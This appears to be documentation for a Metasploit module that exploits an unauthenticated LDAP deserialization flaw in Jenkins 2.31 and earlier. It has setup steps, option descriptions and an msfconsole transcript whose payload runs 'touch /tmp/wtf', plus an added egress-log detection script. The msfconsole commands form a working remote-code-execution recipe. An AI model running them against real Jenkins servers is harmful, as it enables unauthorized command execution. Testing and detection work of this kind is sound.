Vulnerable Application
Jenkins 2.31 and earlier are vulnerable; these versions can be downloaded from updates.jenkins-ci.org.
Exploitation does not require authentication; only HTTP access to the vulnerable application is required.
Verification Steps
- Download Jenkins 2.31
- Install Jenkins: java -jar jenkins.war
- Start msfconsole
- Do: use exploit/linux/misc/jenkins_ldap_deserialize
- Do: set RHOST [target host]
- Do: set PAYLOAD cmd/unix/generic
- Do: set CMD 'touch /tmp/wtf'
- Do: run
- It should create /tmp/wtf on the target host.
Required Options
RHOST
The address of the Jenkins server.
Options
RPORT
The HTTP port for the Jenkins server. (Defaults to 8080)
TARGETURI
The path to the target instance of Jenkins. (Defaults to /)
SRVHOST
The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)
SRVPORT
The local port to listen for the LDAP request on. (Defaults to 1389)
LDAPHOST
The LDAP host the exploit will connect to. Can be different from SRVHOST
in an environment where there is port forwarding. (Defaults to 127.0.0.1)
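Detection note: the SRVHOST, SRVPORT and LDAPHOST options show that the target Jenkins server is made to send an LDAP request to a listener outside its normal directory servers, so egress from the Jenkins host to unapproved destinations is a useful signal. The following is an added example, not part of the module or its documentation; the log format, addresses and names are constructed assumptions.

```python
import ipaddress

# Constructed sample egress log. The record format is an assumption:
# "<timestamp> <src_ip> <dst_ip> <dst_port> <proto>"
SAMPLE_LOG = """\
2024-01-01T10:00:00Z 10.0.0.5 10.0.0.20 636 tcp
2024-01-01T10:00:02Z 10.0.0.5 203.0.113.7 1389 tcp
2024-01-01T10:00:03Z 10.0.0.9 203.0.113.7 1389 tcp
2024-01-01T10:00:05Z 10.0.0.5 198.51.100.4 4444 tcp
malformed line
"""

JENKINS_HOSTS = {"10.0.0.5"}        # hypothetical Jenkins server address
APPROVED_DIRECTORY = {"10.0.0.20"}  # hypothetical approved LDAP server
LDAP_PORTS = {389, 636, 1389}       # 1389 is the module's default SRVPORT


def find_suspect_egress(log_text):
    """Return (line_no, dst_ip, dst_port, reason) for every connection a
    Jenkins host opens to a destination that is not an approved directory."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), start=1):
        fields = line.split()
        if len(fields) != 5:
            continue  # skip malformed records
        _, src, dst, port, _ = fields
        try:
            ipaddress.ip_address(src)
            ipaddress.ip_address(dst)
            port = int(port)
        except ValueError:
            continue  # skip records with bad addresses or ports
        if src not in JENKINS_HOSTS or dst in APPROVED_DIRECTORY:
            continue
        # SRVPORT is configurable, so a non-LDAP port is still reported,
        # only with a less specific reason.
        reason = "ldap-port" if port in LDAP_PORTS else "unapproved-destination"
        findings.append((line_no, dst, port, reason))
    return findings


if __name__ == "__main__":
    for finding in find_suspect_egress(SAMPLE_LOG):
        print(finding)
```
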
Scenarios
Example usage against a Unix target running Jenkins 2.31.
msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.